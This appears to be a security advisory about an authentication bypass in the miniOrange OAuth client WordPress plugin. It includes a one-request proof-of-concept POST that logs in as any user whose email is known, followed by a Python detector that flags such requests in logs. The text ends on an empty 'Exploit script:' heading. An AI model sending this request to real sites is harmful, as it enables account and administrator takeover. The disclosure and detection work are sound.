The plugin was affected by an authentication bypass vulnerability. To bypass authentication, we only need to know a user’s email address. Depending on whose email address we know, we may even be granted an administrator role on the client’s website.

Proof of Concept

POST /vdb/miniorange-oauth-client/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

option=mooauth&[email protected]
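
A log-review check for the request shape shown above, as an added example that is not part of the original advisory: it flags form POSTs whose body carries `option=mooauth` together with any e-mail-like value, and groups the addresses by client so one source trying several accounts stands out. The field name `placeholder_field`, the client IPs and the `example.test` addresses are constructed, because the parameter name is obscured on the page.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def suspect_emails(raw_request):
    """Return e-mail-like values from a form POST whose body has option=mooauth."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip().lower()
    ctype = headers.get("content-type", "")
    if method != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    params = parse_qsl(body.strip(), keep_blank_values=True)  # also URL-decodes %40
    if ("option", "mooauth") not in params:
        return []
    return [v for k, v in params if k != "option" and EMAIL_RE.match(v)]

def summarize(events):
    """events: iterable of (client_ip, raw_request). Map client -> addresses submitted."""
    seen = defaultdict(set)
    for client_ip, raw in events:
        for addr in suspect_emails(raw):
            seen[client_ip].add(addr.lower())
    return dict(seen)

# Constructed sample capture (e.g. from a WAF or audit log that records request bodies).
def _req(body, method="POST"):
    return (f"{method} /vdb/miniorange-oauth-client/ HTTP/1.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + body)

SAMPLE = [
    ("198.51.100.7", _req("option=mooauth&placeholder_field=admin%40example.test")),
    ("198.51.100.7", _req("option=mooauth&placeholder_field=editor%40example.test")),
    ("203.0.113.9", _req("option=other&placeholder_field=user%40example.test")),
    ("203.0.113.9", _req("option=mooauth", method="GET")),
]

if __name__ == "__main__":
    for ip, addrs in summarize(SAMPLE).items():
        print(ip, sorted(addrs))
```

Matching requests should be correlated with session creation for the submitted address, since a login that follows such a POST without a completed OAuth flow is the behaviour described above.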

Exploit script: